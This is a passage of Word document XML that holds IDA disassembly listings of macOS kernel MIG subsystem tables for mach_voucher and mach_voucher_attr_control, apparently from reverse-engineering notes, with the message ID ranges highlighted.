        <w:t>__const:FFFFFF8000E01068                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dd 2Ch                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00E71757" w:rsidRDefault="006227A2" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ach_voucher_subsystem </w:t>
      </w:r>
      <w:r w:rsidR="00ED4A5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 public mach_voucher_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238 ; const mach_voucher_subsystem mach_voucher_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238 mach_voucher_subsystem_0 dq offset mach_voucher_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                                         ; DATA XREF: mach_voucher_server_routine:loc_FFFFFF80003AD162o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                                         ; mach_voucher_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1518h  </w:t>
      </w:r>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">              ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E04238                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>151Dh</w:t>
      </w:r>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd 1430h                ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dq offset _Xmach_voucher_extract_attr_content; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd 4                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E04238                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd 1030h                ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dq 3AD3A000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd 4                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 db 30h, 10h, 2 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dq 1030h                ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd 3AD5B0h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dq 3                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dq 143000000000h        ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd 3AD7C0h              ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dq 7FFFFFF80h           ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E04238                 dq 1030h                ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRPr="00B823FC" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRDefault="00B823FC" w:rsidP="00B823FC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B823FC">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04238                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B823FC" w:rsidRDefault="00F07003" w:rsidP="00B823FC">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ach_voucher_attr_control_subsystem </w:t>
      </w:r>
      <w:r w:rsidR="00B823FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>_const:FFFFFF8000E04320                 public mach_voucher_attr_control_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320 ; const mach_voucher_attr_control_subsystem mach_voucher_attr_control_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320 mach_voucher_attr_control_subsystem_0 dq offset mach_voucher_attr_control_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                                         ; DATA XREF: mach_voucher_attr_control_server_routine:loc_FFFFFF80003ADFB2o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                                         ; mach_voucher_attr_control_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E04320                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">15E0h </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">               ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E04320                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">15E2h </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">               ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                 dd 50h                  ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                 dq offset _Xmach_voucher_attr_control_get_values; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                 dd 4                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07003">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04320                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07003" w:rsidRPr="00F07003" w:rsidRDefault="00F07003" w:rsidP="00F07003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
